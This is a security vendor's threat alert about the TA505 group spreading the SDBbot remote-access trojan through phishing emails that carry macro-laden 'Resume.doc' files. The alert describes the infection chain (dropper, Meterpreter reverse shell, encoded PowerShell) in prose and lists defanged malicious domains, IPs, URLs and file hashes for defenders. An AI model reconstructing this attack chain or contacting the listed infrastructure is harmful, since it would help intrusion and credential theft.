• Services
    • Assess
      • Compromise Assessment
      • APT Assessment
      • Penetration Testing
      • Secure Architecture Design & Review
      • Red Team Assessment
      • Purple Team Assessment
      • Social Engineering
      • Source Code Review
    • Transform
      • SOC Consultancy
      •     SOC Maturity Assessment
      •     SOC Model Evaluation
      •     SOC Gap Analysis
      •     SIEM Gap Analysis
      •     SIEM Optimization
      •     SOC Content Pack
    • Train
      • Security Awareness and Training
      • Tabletop Exercise
      • Simulated Cyber Attack Exercises
    • Respond
      • Incident Response
      • Incident Analysis
  • Managed Security
    • Managed Security Monitoring
      • Remote SOC
      • Onsite SOC
      • Hybrid SOC
    • Managed Security Services
      • Managed Detection and Response
      • Managed Endpoint Detection and Response
      • Managed Threat Intelligence
      • Managed Threat Hunting
      • Managed Risk-Based SOAR
      • Managed Penetration Testing
  • Solutions
  • Resources
    • Blog
    • Press Release
    • Threat Advisory
  • Company
    • About Us
    • Careers
    • Contact
Rewterz Threat Advisory – ICS: Siemens KTK, SIDOOR, SIMATIC, and SINAMICS
April 15, 2020
Rewterz Threat Advisory – ICS: Siemens IE/PB-Link, RUGGEDCOM, SCALANCE, SIMATIC, SINEMA Denial of Service Vulnerabilities
April 15, 2020

Rewterz Threat Alert – TA505 Crime Gang Deploys SDBbot for Corporate Network Takeover

April 15, 2020

Severity

High

Analysis Summary

The TA505 cybercrime group has ramped up its attacks lately, with a set of campaigns bent on spreading the persistent SDBbot remote-access trojan (RAT) laterally throughout an entire corporate environment. SDBbot RAT is a custom job that has been observed in TA505 attacks since at least September 2019; it offers remote-access capabilities and has a few spyware aspects, including the ability to exfiltrate data from the victimized devices and networks.The custom RAT also offers persistent access and lateral network movement. 

Recently, targeted emails were sent to enterprise employees in Europe. The malicious emails purported to be messages coming from the HR department via Onehub, which is a legitimate, cloud-based file-sharing application for businesses. The messages had attached, macro-enabled documents called simply “Resume.doc.” And if opened, they ultimately delivered the SDBbot malware, via a dropper containing embedded dynamic-link libraries (DLLs) and the use of an installer component. The emails were designed to extract Active Directory (AD) discovery data and user credentials, and to infect the environment with the SDBbot RAT. Once the malicious code was executed, it dropped a malicious binary (DLL) similar to CobaltStrike, which subsequently created and executed additional files. The three additional files make up SDBbot; there’s an installer, a loader and the payload itself. A Meterpreter reverser shell was used in order to remotely control compromised systems within the internal network. It was installed as a service using the execution of an encoded PowerShell script. The malicious PowerShell command decodes into a reverse shell connecting back to two malicious IP addresses. Analysts expect that this group will continue to target a wide range of industries using social engineering to deliver open-source and custom malware, while constantly adjusting TTPs and C2 infrastructure to evade detection.

Impact

  • Credential Theft
  • Unauthorized Remote Access
  • Data exfiltration
  • Network-wide infection

Indicators of Compromise

Domain Name

  • drm-server-booking[.]com
  • microsoft-live-us[.]com
  • dl1[.]sync-share[.]com
  • office365-update-en[.]com
  • d1[.]syncdownloading[.]com
  • googledrive-download[.]com
  • update365-office-ens[.]com
  • office-en-service[.]com
  • news-server-drm-google[.]com
  • drm-server-booking[.]com

MD5

  • edbe98468cd888bf029bc8e297a310b3
  • 994104c30d57141a99e0e414ef2d8837
  • ab9103c8fd35ec7b5a99e463a2f8fc59
  • 61b94dfc9bea1a876b140a72c450e4bb
  • cd1096991867bb5ad72b983441bfe04b
  • e14d7460f62a122d85a2ce1b69080497
  • 0fdb43fc559a35afcc422b786f45a997
  • bc59fa5dbb11f5d286fc41e8f25c6cc0
  • 888fa9c56b06cf6255142e2c592b2437
  • 945fff5b2d903ccc0787f41a9ba6df98

SHA-256

  • 7be0da2a873fe10fadb76b241460badbd5d6533237e99ca7a59f4b6676edcc33
  • a04d0cb7362e3650239230b40fac1d2d42357cec1ded2e78456e49dd6713b470
  • 1cbad7cdb6a27a48c98a75b28ca2c63116440dd7891f7300e2109d36b8aae7a1
  • 169f8f4798d048e1c50dac25417ad639b951571a371346401cc981d677b2d5ac
  • e12e250047a8074c9f68199b81b05414ec5461a9e94af225ba3896948dad882e
  • c850d3b6c9a8a8af6072e79fa1430bb1d2290d2b59ccfe6b2edb5a6de1464326
  • 50bf52cbfcdfa125120b7b7b79218a0a09cbd8b5fac4db1be35dc63f7e557ec8
  • 0e40ba8c2c0a2fcbb5290d131bb42651f90f33f5e230556736a5acb4ffd4251d
  • 238d40bbc430c6098a8ad4682ac3722e36b1d2e91fc9030124e5152b6b186e94
  • bc7ea56a2dd0f7a2db378da4565c6fe97968e1387f2e16d3adb82fd75e53d33a

SHA1

  • bf0f7abda2228059bb00ec9658ee447fbe84d277
  • d40510da42a478d72e649993208710668a7f6c27
  • 0cc7cca16afd632857e3883c06b2f55c057b563e
  • d36e983886a084887f887c6d562d3bc0664587c4
  • fea7d944e317c7b2ef1aba57600a8c5310368085
  • 35423e04e58ab1f2267e19c47e1c69ea5b7041cc
  • fd9620c0c295caaee3096423532bb1dbfb7064c5
  • cb0b39534d99057b02b090c3650fb1de43d19a02
  • caff1d315a5d87014e5fa62346f58407755d971e
  • 45c43ec18d15ba7850e6ad2e2e54671636f4d926

Source IP

91[.]214[.]124[.]25
91[.]214[.]124[.]20
185[.]176[.]221[.]45

URL

  • https[:]//clck[.]ru/JnFFT
  • https[:]//clck[.]ru/JnFFT&data=02|01||bed42450519b40df

Remediation

  • Block the threat indicators at their respective controls.
  • Do not download unexpected files coming from untrusted email addresses.
  • Ensure employ awareness about latest phishing emails and subjects.
  • Services
    • Assess
      • Compromise Assessment
      • APT Assessment
      • Penetration Testing
      • Secure Architecture Design & Review
      • Red Team Assessment
      • Purple Team Assessment
      • Social Engineering
      • Source Code Review
    • Respond
      • Incident Response
      • Incident Analysis
  • Transform
    • SOC Consultancy
    •     SOC Maturity Assessment
    •     SOC Model Evaluation
    •     SOC Gap Analysis
    •     SIEM Gap Analysis
    •     SIEM Optimization
    •     SOC Content Pack
  • Train
    • Security Awareness and Training
    • Tabletop Exercise
    • Simulated Cyber Attack Exercises
  • Managed Security
    • Managed Security Monitoring
      • Remote SOC
      • Onsite SOC
      • Hybrid SOC
    • Managed Security Services
      • Managed Detection and Response
      • Managed Endpoint Detection and Response
      • Managed Threat Intelligence
      • Managed Threat Hunting
      • Managed Risk-Based SOAR
      • Managed Penetration Testing
  • Solutions
  • Resources
    • Blog
    • Threat Advisory
  • Company
    • About Us
    • Careers
    • Contact
COPYRIGHT © REWTERZ. ALL RIGHTS RESERVED.